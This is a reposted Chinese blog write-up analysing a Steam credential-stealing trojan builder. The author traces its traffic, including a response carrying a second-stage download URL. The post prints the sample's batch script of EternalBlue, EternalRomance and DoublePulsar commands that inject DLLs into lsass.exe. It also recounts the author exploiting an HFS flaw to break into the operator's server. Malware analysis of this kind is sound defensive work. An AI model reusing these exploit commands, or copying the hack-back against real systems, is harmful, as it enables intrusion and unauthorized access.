转载

steam盗号的背后

steam盗号的背后

1.前言

偶然看到一个steam盗号的视频,里面通过软件生成木马,打开之后如果输入了steam的账号密码,账号密码就会被盗取,如果那个电脑还登录了qq,甚至还可以通过登录qq邮箱来重置steam的密码(没有手机令牌,登录的qq邮箱为绑定steam的邮箱)

steam盗号的背后

steam盗号的背后

在不可描述的交易之后,我拿到的样本

steam盗号的背后

解压,丢到了虚拟机

2.分析

首先看了一下目录,里面好多fne格式结尾的文件,在文件夹的最后一行看到了客户端

steam盗号的背后

这又大又闪的图标,难道是传说中的更换图标免杀么,我赶紧下载了图中的杀软,测试了一下

steam盗号的背后

steam盗号的背后

首先是断网测试的,打开软件试一试

steam盗号的背后

哦吼,竟然还敢直接放qq出来

steam盗号的背后

打开网站

steam盗号的背后

这难道就是真正的黑客吗

steam盗号的背后

虚拟机联网,再次打开软件

steam盗号的背后

通过 wireshark 看一下流量

steam盗号的背后

首先返回了我的登录ip,之后返回了版本信息,最后返回了通知

注册一个账户登录一下

steam盗号的背后

登录之后在不断的请求服务器,判断是否获取到新的账号密码

steam盗号的背后

生成一个木马

steam盗号的背后

直接就在虚拟机打开

在看流量的时候发现了一个 rj.txt

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 15 Jun 2020 20:10:00 GMT
Accept-Ranges: bytes
ETag: "6e3317f35043d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 28 Jun 2020 09:11:18 GMT
Content-Length: 120
​
http://note.youdao.com/yws/public/resource/ad9c19d74a1ee52aac35d1b1bab19b99/xmlnote/A33ECF11E57E4599B93D54D74F14C11B/335

之后的流量应该是下载了一个文件

steam盗号的背后

等待文件下载完之后,看到了一串异常的流量

steam盗号的背后

在遍历这个c段,感觉事情有点不妙,回头一看虚拟机已经蓝屏重启了…

steam盗号的背后

把样本丢到微步

steam盗号的背后

steam盗号的背后

果然,在扫内网的永恒之蓝

steam盗号的背后

可能因为虚拟机分配的内存比较小,所以一打就蓝屏了

接下来找到下载的文件

steam盗号的背后

发现了攻击脚本

把虚拟机的内存调整为6g,之后更改脚本配置,直接打虚拟机

@echo off
mode con cols=100 lines=50&color 0c
set a=127.0.0.1
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a%  --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll  --DllPayload dll/64.dll
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll  --DllPayload dll/86.dll
​
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a%  --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll  --DllPayload Eternalblue.dll
Eternalblue-2.2.0.exe  --TargetIp  %a%  --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe  --TargetIp  %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll  --DllPayload Doublepulsar.dll
​
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target WIN72K8R2  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x64 --Function RunDLL  --DllPayload dll/64.dll
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target XP  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x86 --Function RunDLL  --DllPayload dll/86.dll
​
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target WIN72K8R2  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x86 --Function RunDLL  --DllPayload Eternalblue.dll
Eternalromance-1.4.0.exe  --TargetIp  %a%  --Target XP  --logfile log.txt
Doublepulsar-1.3.1.exe  --TargetIp  %a% --Protocol SMB --Architecture x64 --Function RunDLL  --DllPayload Doublepulsar.dll
​
echo %a%>>goodlog.txt
exit
​

发现请求了另一台主机,并且下载了文件

steam盗号的背后

打开网站

steam盗号的背后

已经有了2400多次的下载

看一下本地建立的链接

steam盗号的背后

这个8000端口对应的ip应该就是对方的c2了

下载的文件继续放到微步分析

steam盗号的背后

在shodan查看一下端口信息,

steam盗号的背后

在他的hfs服务上存在命令执行漏洞(hfs2.3c及以前的2.3x版本存在rce)

steam盗号的背后 设置好参数,攻击成功后,获得截图

steam盗号的背后 现在对方已经修复漏洞

steam盗号的背后

3.结尾

拿下对方服务器没多久,攻击行为被对方发现,并且修补了漏洞,在日常下载软件的时候一定要在正规途径下载,使用杀软(多少有些作用)保护自己电脑的安全。

原文  http://4hou.win/wordpress/?p=46271
正文到此结束
Loading...